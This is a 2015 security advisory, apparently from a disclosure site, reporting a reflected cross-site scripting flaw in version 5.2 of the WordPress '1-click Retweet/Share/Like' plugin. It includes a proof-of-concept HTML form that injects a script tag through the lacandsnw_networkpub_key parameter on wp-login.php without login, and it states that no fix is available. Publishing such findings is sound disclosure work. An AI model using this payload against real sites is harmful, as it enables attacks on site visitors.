WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting

2015.08.03

Credit: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Title: WordPress '1-click Retweet/Share/Like' Plugin
Version: 5.2
Author: Morten N?rtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download:
- https://wordpress.org/plugins/1-click-retweetsharelike/
- https://plugins.svn.wordpress.org/1-click-retweetsharelike/
Notified Vendor/WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ
## Vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS.
PoC:
Submit the following request (no need to login first..)
<form method="POST" action="[URL]/wp-login.php">
<input type="text" name="lacandsnw_networkpub_key" value="&quot;><script>alert(1)</script>"><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.